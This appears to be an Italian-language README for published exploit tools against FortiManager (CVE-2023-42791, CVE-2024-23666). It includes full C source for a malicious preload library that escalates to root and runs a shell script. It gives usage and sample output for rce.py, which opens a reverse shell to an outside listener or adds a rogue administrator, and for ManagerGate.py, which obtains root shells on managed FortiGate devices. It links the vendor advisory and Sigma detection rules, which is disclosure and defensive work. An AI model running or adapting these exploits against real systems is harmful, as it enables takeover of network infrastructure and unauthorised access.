
Script di exploit per CVE-2023-42791 e CVE-2024-23666.
Sono forniti due script di sfruttamento che sfruttano queste vulnerabilità:
rce.py: Fornisce una reverse shell o aggiunge un amministratore arbitrario da accesso non privilegiato al FortiManager.ManagerGate.py: Consente di connettersi ai servizi SSH remoti dei FortiGate gestiti. Le password SSH sono ancora necessarie, ma possono essere trovate nel backup di configurazione del FortiManager.Per maggiori dettagli, fare riferimento al advisory associato disponibile su https://www.synacktiv.com/advisories/advisories/fortimanager-multiple-vulnerabilities
Compilare una libreria dannosa che eseguirà /rce.sh:
$ cat rce.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
if (getuid() != 0) return 0;
unlink("/etc/ld.so.preload");
if (fork() == 0) {
setgid(0);
setuid(0);
system("/bin/bash /rce.sh");
}
return 0;
}
$ gcc -fPIC -shared -o rce.so rce.c -nostartfiles
Utilizzo:
$ python3 rce.py -h
usage: rce.py [-h] [-k] [-l LIBRARY] connection {revshell,adduser} ...
positional arguments:
connection User, password, and host (user:password@host)
options:
-h, --help show this help message and exit
-k, --insecure Do not check the remote host certificate (default: False)
-l LIBRARY, --library LIBRARY
Malicious library path (default: /tmp/rce.so)
Action to run:
{revshell,adduser}
revshell Run a Python reverse shell
adduser Create a new administrator
Per ottenere una reverse shell:
$ python3 rce.py -k -l ./rce.so lowpriv:[email protected] revshell 10.10.10.100 1234
[+] Login to the FortiManager
[+] Uploading /rce.sh
[+] Uploading /rce.so
[+] Uploading /etc/ld.so.preload
[+] Login out of the FortiManager to trigger the RCE
Per aggiungere un nuovo amministratore al FortiManager:
$ python3 rce.py -k -l ./rce.so lowpriv:[email protected] adduser malicious_adm password
[+] Login to the FortiManager
[+] Uploading /create_user.txt
[+] Uploading /rce.sh
[+] Uploading /rce.so
[+] Uploading /etc/ld.so.preload
[+] Login out of the FortiManager to trigger the RCE
$ python3 ManagerGate.py -h
usage: ManagerGate.py [-h] -H HOST -u USER -p PASSWORD [-d DEVICEID] [-i TUNNELIP] [-l] [-x PROXY] -U GU [-v VERBOSE]
get a shell on fortigate
options:
-h, --help show this help message and exit
-H HOST, --host HOST host of the fortimanager
-u USER, --user USER user to connect with to the fortimanager
-p PASSWORD, --password PASSWORD
password to connect to the fortimanager
-d DEVICEID, --deviceid DEVICEID
device oid to get shell
-i TUNNELIP, --tunnelip TUNNELIP
tunnel ip of the fortigate
-l, --local local connect to fortimanager
-x PROXY, --proxy PROXY
proxy request
-U GU, --gu GU user to connect with to the fortigate
-v VERBOSE, --verbose VERBOSE
Esempio
$ python3 ManagerGate.py -H 10.0.0.1 -u ReadOnlyUser -p MyPassword123 -d 1011 -i 169.254.0.2 -U root
L'OID del dispositivo e l'IP del tunnel dei FortiGate presi di mira possono essere trovati nella GUI del FortiManager.
Le regole di rilevamento Sigma volte a rilevare l'uso di questi script di sfruttamento sono disponibili nel repository di regole di Synacktiv: https://github.com/synacktiv/synacktiv-rules/tree/main/2025/fortimanager